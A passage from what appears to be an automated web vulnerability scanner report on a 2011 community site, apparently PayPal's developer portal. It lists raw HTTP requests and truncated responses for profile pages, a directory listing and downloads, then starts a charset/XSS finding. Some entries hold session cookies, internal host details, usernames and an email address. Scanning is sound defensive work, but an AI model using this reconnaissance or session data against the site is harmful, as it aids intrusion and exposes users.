Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.46. https://www.x.com/people/hotellina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.47. https://www.x.com/people/iConcessionStand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.48. https://www.x.com/people/joncas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.49. https://www.x.com/people/lwhite2104  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.50. https://www.x.com/people/mandeheritage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133393730313b332c3133343430323b332c3134303635343b332c39313330313b332c3132323335343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.51. https://www.x.com/people/odeskdev  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.52. https://www.x.com/people/omuleanu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.53. https://www.x.com/people/pluto26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.54. https://www.x.com/people/posiden5665  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3134303635343b332c3133343430323b332c34383739343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.55. https://www.x.com/people/ramonmorales123  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132323335343b332c3133343430323b332c34383739343b332c3134303635343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.56. https://www.x.com/people/rizkygarut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133363935343b332c35333735313b332c3133383538323b332c36303039313b332c3133373131353b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.57. https://www.x.com/people/roguereptile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.58. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.59. https://www.x.com/people/sebastian.kopp@wooga.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.60. https://www.x.com/people/skier  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31323739393b332c3133313833303b332c3133363236393b332c3132393239303b332c3133373135383b332c3133373331333b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.61. https://www.x.com/resources/scripts/fancyzoom/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/fancyzoom/images/

Request

GET /resources/scripts/fancyzoom/images/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 0
JP: D=1433 t=1313157093676141
Cache-Control: max-age=2016000, public
Vary: User-Agent
Connection: close


11.62. https://www.x.com/resources/scripts/tiny_mce3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/tiny_mce3

Request

GET /resources/scripts/tiny_mce3 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 353
JP: D=2144 t=1313157093566199
Vary: User-Agent
Connection: close

classes
langs
license.txt
plugins
themes
tiny_mce_dev.js
tiny_mce_dev-min.js
tiny_mce_gzip.js
tiny_mce_gzip-min.js
tiny_mce_init.js
tiny_mce_init-min.js
tiny_mce_jquery.js
tiny_mce_jquery-min.js
tiny_
...[SNIP]...

11.63. https://www.x.com/servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

Request

GET /servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:44 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:34:56 GMT
Etag: "3.0.7-167309"
Content-disposition: attachment
Pragma: expires
Cache-Control: private
Content-Type: application/pdf
Content-Length: 167309
JP: D=3016 t=1313156384521909
Vary: User-Agent
Connection: close

%PDF-1.4%....
7 0 obj<</Linearized 1/L 167309/O 9/E 123864/N 2/T 167128/H [ 1436 300]>>endobj xref7 570000000016 00000 n
0000001736 00000 n
0000001832 00000 n
0000002405 000
...[SNIP]...

11.64. https://www.x.com/servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

Request

GET /servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:41 GMT
Etag: "3.0.7-193831"
Content-disposition: attachment
Pragma: expires
Cache-Control: private
Content-Type: application/pdf
Content-Length: 193831
JP: D=2254 t=1313157225870164
Vary: User-Agent
Connection: close

%PDF-1.4%....
9 0 obj<</Linearized 1/L 193831/O 11/E 124255/N 2/T 193610/H [ 1436 301]>>endobj xref9 570000000016 00000 n
0000001737 00000 n
0000001834 00000 n
0000002408 000
...[SNIP]...

11.65. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Request

GET /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:29 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:50 GMT
Cache-Control: max-age=60
Content-Type: text/html
Content-Length: 196
JP: D=290 t=1313114370000022
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive

<html><head><title>Jive SBS</title></head>
<body><font face="arial,helvetica,sans-serif">
<b>Error</b><br><font size="-1">
The requested document could not be loaded.
</font></font></body></html>

11.66. https://www.x.com/tags  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Request

GET /tags HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=270750 t=1313157263884148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.67. https://www.x.com/themes/paypal/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.ico

Request

GET /themes/paypal/images/favicon.ico HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:28 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1499 t=1313114368699966
Content-Length: 3638
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive

...... ..........&...........h.......(... ...@........................................v..r7...Z*..X...p(.J...y...h...K...[...e%..o...b.{B...T...Q..._...S...[!..m..G...T$.x>...\...Y...a...S    ..K...Q
...[SNIP]...

11.68. https://www.x.com/threads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /threads

Request

GET /threads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=399265 t=1313157098002095
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

